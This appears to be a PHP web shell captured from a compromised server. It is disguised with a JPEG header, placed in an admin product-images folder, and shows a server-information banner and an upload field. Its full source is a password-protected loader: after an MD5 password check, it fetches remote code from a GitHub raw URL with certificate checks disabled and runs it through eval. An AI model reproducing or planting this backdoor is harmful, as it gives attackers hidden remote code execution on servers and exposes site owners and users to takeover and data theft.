����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 216.73.216.230 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/root/proc/self/root/var/www/html/admin/productimages/13/ |
Upload File : |
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['SAP'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['SAP']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } // Check if the password is submitted and correct if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = '9ccbb02999e3a63e09411237968a69e9'; // 48 if (md5($entered_password) === $hashed_password) { // Password is correct, store it in session $_SESSION['logged_in'] = true; $_SESSION['SAP'] = 'janco'; // Replace this with your cookie data } else { // Password is incorrect echo "Maaf Anda Kurang Profesional. Silahkan Coba Lagi."; } } // Check if the user is logged in before executing the content if (is_logged_in()) { $a = geturlsinfo('https://raw.githubusercontent.com/anomim989/ho/refs/heads/main/xts'); eval('?>' . $a); } else { // Display login form if not logged in ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Secure Access Portal</title> <style> body { margin: 0; padding: 0; background: linear-gradient(to right, #0f2027, #203a43, #2c5364); font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; color: #00fff7; display: flex; justify-content: center; align-items: center; height: 100vh; overflow: hidden; } .container { background: rgba(0, 0, 0, 0.75); padding: 40px; border-radius: 12px; box-shadow: 0 0 25px #00fff7; text-align: center; width: 90%; max-width: 400px; animation: fadeIn 1s ease-in-out; } .container img { width: 120px; margin-bottom: 20px; filter: drop-shadow(0 0 10px #00fff7); } h2 { margin-bottom: 30px; font-weight: 400; } input[type="password"] { padding: 12px; width: 100%; margin-bottom: 20px; border: none; border-radius: 6px; background-color: #112; color: #00fff7; border: 1px solid #00fff7; font-size: 16px; outline: none; transition: all 0.3s ease; } input[type="password"]:focus { border-color: #66fcf1; box-shadow: 0 0 10px #66fcf1; } input[type="submit"] { padding: 12px 25px; background-color: #00fff7; border: none; border-radius: 6px; color: #000; font-weight: bold; cursor: pointer; font-size: 16px; transition: background-color 0.3s ease; } input[type="submit"]:hover { background-color: #00e5cc; } @keyframes fadeIn { from { opacity: 0; transform: translateY(-20px); } to { opacity: 1; transform: translateY(0); } } </style> <body bgcolor="black"> <center> <div class="container"> <img src="https://media.giphy.com/media/f9k1tV7HyORcngKF8v/giphy.gif" alt="Animated Security Graphic" /> <body style="background-color:black;"> <form method="POST" action=""> <label for="password">Access Team PJP :</label><br><br> <input type="password" id="password" name="password"><br> <input type="submit" value="LOGIN"> </form> </center> </body> </html> <?php } ?>